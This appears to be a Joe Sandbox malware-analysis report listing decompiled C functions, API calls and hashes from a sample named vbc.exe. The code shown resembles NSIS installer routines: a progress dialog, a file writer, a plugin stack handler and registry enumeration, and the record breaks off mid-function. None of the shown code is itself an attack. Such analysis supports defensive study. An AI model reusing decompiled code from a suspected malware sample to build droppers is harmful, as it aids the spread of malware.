Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x274ca
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32 ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32 ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 73282655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E73282655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E732812BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M73282784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7328407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7328409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73281510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7328506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7328506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7328506c);
								goto L17;
							case 5:
								_push( *0x7328506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x73285000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E73281381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E73281312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x7328265f
0x73282661
0x73282665
0x73282674
0x73282678
0x7328267d
0x7328267d
0x73282685
0x7328268c
0x73282692
0x00000000
0x73282699
0x00000000
0x00000000
0x732826a1
0x732826a5
0x732826a8
0x732826ac
0x732826b3
0x732826b7
0x732826bd
0x732826bf
0x732826c1
0x732826c1
0x732826c8
0x00000000
0x00000000
0x732826d1
0x00000000
0x00000000
0x732826d8
0x732826de
0x732826e8
0x732826ee
0x732826f3
0x00000000
0x00000000
0x73282714
0x00000000
0x00000000
0x732826fa
0x73282700
0x73282701
0x73282703
0x00000000
0x00000000
0x7328271c
0x7328271e
0x73282724
0x7328272a
0x7328272a
0x00000000
0x00000000
0x73282692
0x7328272d
0x7328272d
0x73282732
0x73282743
0x73282743
0x73282749
0x7328274e
0x73282753
0x7328275f
0x73282764
0x00000000
0x73282769
0x73282755
0x73282756
0x7328276a
0x7328276a
0x73282753
0x7328276b
0x7328276c
0x7328276f
0x73282783

APIs

Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5

GlobalFree.KERNEL32(?), ref: 73282743
GlobalFree.KERNEL32(00000000), ref: 73282778

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
Instruction ID: b34f27f60080445c526e11579c6f1be6ab316017ca26752e04c272a69485bd57
Opcode Fuzzy Hash: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
Instruction Fuzzy Hash: FA31047260431ADFD71A9F52CD88FEA7BBAFB853043248129F106972D0C7746884EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 73281979 Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73281979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7328506c = _a8;
				_t77 = 0;
				 *0x73285070 = _a16;
				_v12 = 0;
				_v8 = E732812E3();
				_t90 = E732813B1(_t42);
				_t87 = _t85;
				_t81 = E732812E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E732812E3();
					_t77 = E732813B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73281510(_t85, _t90, _t87,  &_v76);
								E73281312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73283050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E73283070(_t59, _t83, _t85);
						} else {
							_t48 = E732830A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73282EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73282F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73282EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73281979
0x73281983
0x7328198c
0x7328198f
0x73281994
0x7328199d
0x732819a6
0x732819a8
0x732819af
0x732819b1
0x732819b4
0x732819bb
0x732819c9
0x732819d2
0x732819d7
0x732819da
0x732819e0
0x732819e0
0x732819e3
0x732819e6
0x732819e9
0x73281ab1
0x73281ab1
0x73281ab4
0x73281b34
0x73281b39
0x73281b48
0x73281b4b
0x73281b53
0x73281b53
0x73281b53
0x73281b55
0x73281b55
0x73281b56
0x73281b56
0x73281b58
0x73281b5a
0x73281b60
0x73281b69
0x73281b7a
0x73281b85
0x73281b85
0x73281b4d
0x73281b2f
0x73281b2f
0x73281b31
0x73281b31
0x00000000
0x73281b31
0x73281b4f
0x73281b51
0x00000000
0x00000000
0x00000000
0x73281b51
0x73281b3d
0x73281b41
0x00000000
0x73281b41
0x73281ab6
0x73281ab6
0x73281ab7
0x73281b26
0x73281b28
0x00000000
0x00000000
0x73281b2a
0x73281b2d
0x00000000
0x00000000
0x00000000
0x73281b2d
0x73281ab9
0x73281ab9
0x73281aba
0x73281af7
0x73281afc
0x73281b19
0x73281b1c
0x00000000
0x00000000
0x73281b1e
0x00000000
0x00000000
0x73281b20
0x73281b22
0x00000000
0x00000000
0x00000000
0x73281b24
0x73281afe
0x73281b03
0x73281b05
0x73281b07
0x73281b09
0x73281b12
0x73281b0b
0x73281b0b
0x73281b0b
0x00000000
0x73281b09
0x73281abc
0x73281abc
0x73281abf
0x73281af0
0x73281af2
0x00000000
0x73281af2
0x73281ac1
0x73281ac1
0x73281ac4
0x73281ad7
0x73281adc
0x73281ae9
0x73281aeb
0x00000000
0x73281aeb
0x73281ade
0x73281ae0
0x00000000
0x00000000
0x73281ae2
0x73281ae5
0x00000000
0x00000000
0x00000000
0x73281ae7
0x73281ac7
0x73281ac8
0x73281ace
0x73281ad0
0x73281ad0
0x00000000
0x73281ac8
0x732819ef
0x73281a68
0x73281a6a
0x73281a6d
0x73281a8b
0x73281a8e
0x73281a94
0x73281a99
0x73281a6f
0x73281a6f
0x73281a73
0x73281a77
0x73281a79
0x73281a79
0x73281a9c
0x73281aa0
0x00000000
0x73281aa6
0x73281aa6
0x73281aa9
0x00000000
0x73281aa9
0x73281aa0
0x732819f1
0x732819f4
0x73281a59
0x73281a5b
0x73281a5d
0x00000000
0x00000000
0x00000000
0x73281a63
0x732819f6
0x732819f9
0x00000000
0x00000000
0x732819fb
0x732819fc
0x73281a32
0x73281a37
0x73281a4f
0x73281a51
0x00000000
0x73281a51
0x73281a39
0x73281a3b
0x00000000
0x00000000
0x73281a41
0x73281a44
0x00000000
0x00000000
0x00000000
0x73281a4a
0x732819fe
0x73281a01
0x73281a28
0x00000000
0x73281a03
0x73281a03
0x73281a04
0x73281a18
0x73281a1a
0x73281a06
0x73281a08
0x73281a0e
0x73281a10
0x73281a10
0x73281a08
0x00000000
0x73281a04

APIs

GlobalFree.KERNEL32(?), ref: 732819DA
GlobalFree.KERNEL32(?), ref: 73281B7A
GlobalFree.KERNEL32(?), ref: 73281B7F

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
Instruction ID: 2f3065ae273deb59b454a12a6298ab46455d55243d5b5f681912ee59548531d7
Opcode Fuzzy Hash: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
Instruction Fuzzy Hash: BA51E732F1021AABDB069FACC4447DEBBBAEB44310F18815AD406B32D4F6B5B9C5C791

Uniqueness

Uniqueness Score: -1.00%

Function 73282480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E73282480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7328135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E732812E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M732825F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E732813B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E732813B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7328506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7328506c, __eax,  *0x7328506c, 0, 0);
									goto L27;
								case 4:
									__eax = E732812CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E732813B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7328506c =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
									 *__ebx =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
									asm("cdq");
									__eax = E73281510(__edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18, __edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E732812CC(0x73285044);
					goto L10;
				}
			}

0x73282494
0x73282498
0x732824a3
0x732824a3
0x732824aa
0x732824af
0x00000000
0x00000000
0x732824b3
0x732824b6
0x00000000
0x00000000
0x732824bb
0x732824c6
0x732824d6
0x00000000
0x732824cd
0x732824cf
0x732824e5
0x00000000
0x732824e5
0x732824bd
0x732824bd
0x732824e6
0x732824e6
0x732824e8
0x732824ec
0x732824ec
0x732824ef
0x732824ef
0x732824f7
0x732824ff
0x73282502
0x732825c1
0x732825c2
0x732825cd
0x732825f7
0x732825f7
0x732825dd
0x732825e9
0x732825df
0x732825df
0x732825df
0x00000000
0x73282508
0x73282508
0x00000000
0x7328250f
0x00000000
0x00000000
0x73282517
0x00000000
0x00000000
0x73282525
0x73282527
0x00000000
0x00000000
0x73282548
0x7328254e
0x73282551
0x73282553
0x73282563
0x00000000
0x00000000
0x73282530
0x73282535
0x73282538
0x73282539
0x00000000
0x00000000
0x7328256f
0x73282575
0x73282576
0x73282579
0x7328257a
0x7328257c
0x00000000
0x00000000
0x73282588
0x7328258b
0x73282597
0x73282599
0x00000000
0x00000000
0x732825a5
0x732825b1
0x732825b4
0x732825b6
0x732825b9
0x00000000
0x00000000
0x73282508
0x73282502
0x732824db
0x732824e0
0x00000000
0x732824e0

APIs

GlobalFree.KERNEL32(00000000), ref: 732825C2

Part of subcall function 732812CC: lstrcpynW.KERNEL32(00000000,?,7328137F,00000019,732811CA,-000000A0), ref: 732812DC

GlobalAlloc.KERNEL32(00000040), ref: 73282548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73282563

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
Instruction ID: 35ab77e44c613133930b6aceebc56fc9d5167dad3f7b76c25f2f07bda146a88a
Opcode Fuzzy Hash: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
Instruction Fuzzy Hash: 0D419CB110931ADFE719EF259844BE677F8FB48310F20891DE84A865C1E778A5C4DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
